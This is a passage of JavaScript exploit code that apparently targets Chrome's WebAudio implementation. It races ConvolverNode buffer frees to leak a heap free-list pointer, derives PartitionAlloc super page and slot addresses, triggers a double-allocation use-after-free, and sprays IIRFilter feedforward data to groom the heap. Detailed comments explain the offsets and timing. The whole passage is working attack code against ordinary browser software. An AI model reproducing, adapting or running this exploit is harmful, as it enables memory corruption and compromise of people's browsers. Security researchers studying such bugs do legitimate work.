null;\r\n await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer\r\n\r\n if (Finished) {\r\n break;\r\n }\r\n\r\n for (let i = 0; i < IIRFilters.length; i++) {\r\n OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. \r\n IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);\r\n\r\n if (OutputFloatArray[0] != 3.1415927410125732) {\r\n Finished = true;\r\n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/\"holding\" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. \r\n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));\r\n AudioBufferSourceNode.disconnect();\r\n ConvolverNode.disconnect();\r\n return;\r\n }\r\n }\r\n\r\n ConvolverNode.buffer = SmallUafBuf;\r\n await Sleep(1);\r\n }\r\n}\r\n\r\nfunction InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {\r\n SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)\r\n HelperBigInt[0] = LeakedFlinkPtr;\r\n DebugLog(\"... leaked free list ptr from ScriptNode audio handler at iteration \" + RenderCount.toString(10) + \": \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);\r\n DebugLog(\"... Super page: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span.\r\n HelperBigInt[0] = FeedforwardSuperPageBase;\r\n DebugLog(\"... first Super Page in extent: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);\r\n FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.\r\n IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.\r\n HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;\r\n DebugLog(\"... IIRFilterFeedforwardAllocPtr: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);\r\n}\r\n\r\nasync function InfoleakUAF(CallbackFunc) { \r\n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode.\r\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\r\n let ConvolverNode = TempAudioCtx.createConvolver(); \r\n let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel.\r\n let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);\r\n let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); \r\n let Finished = false;\r\n let RenderCount = 0;\r\n\r\n ConvolverNode.buffer = ChannelBuf;\r\n AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full\r\n\r\n AudioBufferSourceNode.loop = true;\r\n AudioBufferSourceNode.loopStart = 0;\r\n AudioBufferSourceNode.loopEnd = 1;\r\n\r\n ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread\r\n AudioBufferSourceNode.connect(ConvolverNode);\r\n ConvolverNode.connect(ScriptNode);\r\n ScriptNode.connect(TempAudioCtx.destination);\r\n\r\n AudioBufferSourceNode.start();\r\n \r\n ScriptNode.onaudioprocess = function(Evt) {\r\n RenderCount++;\r\n for (let i = 0; i < 1; i++) {\r\n let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);\r\n\r\n for (let j = 0; j < ChannelInputBuf.length; j++) {\r\n /*\r\n Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.\r\n There are 16384 frames (each the size of a Float32) copied into the input channel buffer each\r\n time this handler receives an event. Typically only 0-1 of these frames will contain a leaked \r\n flink freelist pointer.\r\n */\r\n\r\n if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {\r\n let TempHelperBigInt = new BigUint64Array(1);\r\n let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);\r\n \r\n TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer\r\n TempHelperDword[1] = ChannelInputBuf[j + 1];\r\n \r\n let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);\r\n\r\n // Check QWORD from SharedAudioBuffer for a non-zero value\r\n \r\n if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {\r\n LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?\r\n }\r\n\r\n if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {\r\n // Valid leak: end the recursion cycle for this UAF and execute a callback\r\n \r\n Finished = true;\r\n Evt = null;\r\n AudioBufferSourceNode.disconnect();\r\n ScriptNode.disconnect();\r\n ConvolverNode.disconnect();\r\n setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);\r\n return;\r\n }\r\n }\r\n }\r\n }\r\n };\r\n\r\n TempAudioCtx.startRendering().then(function(Buf) {\r\n Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle\r\n\r\n if (!Finished) {\r\n Finished = true;\r\n InfoleakUAF(CallbackFunc);\r\n\r\n }\r\n });\r\n\r\n /*\r\n Attack the race condition which allows for a free list flink to be copied\r\n into the ScriptNode input channel buffer: the renderer thread is receiving\r\n data into the SharedBuffer in the Convolver, processing it, then copying\r\n it into the ScriptNode input channel until it is full (then the ScriptNode\r\n receives an event). The SharedBuffer must be freed precisely between the\r\n time when new data is received from the BufferSource, and the processed data\r\n is copied into the ScriptNode. Simply freeing the buffer will not work, \r\n since the next chunk of data from the BufferSource will not be placed into\r\n SharedBuffer if it is NULL. However, there is no check if SharedBuffer is\r\n NULL when the processed data it contains is copied into the ScriptNode input.\r\n */\r\n \r\n while (!Finished) {\r\n ConvolverNode.buffer = null;\r\n ConvolverNode.buffer = ChannelBuf;\r\n await Sleep(1); // 1ms\r\n }\r\n}\r\n\r\nfunction FeedforwardHeapGroom() { \r\n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);\r\n let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.\r\n let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.\r\n\r\n // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.\r\n\r\n FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at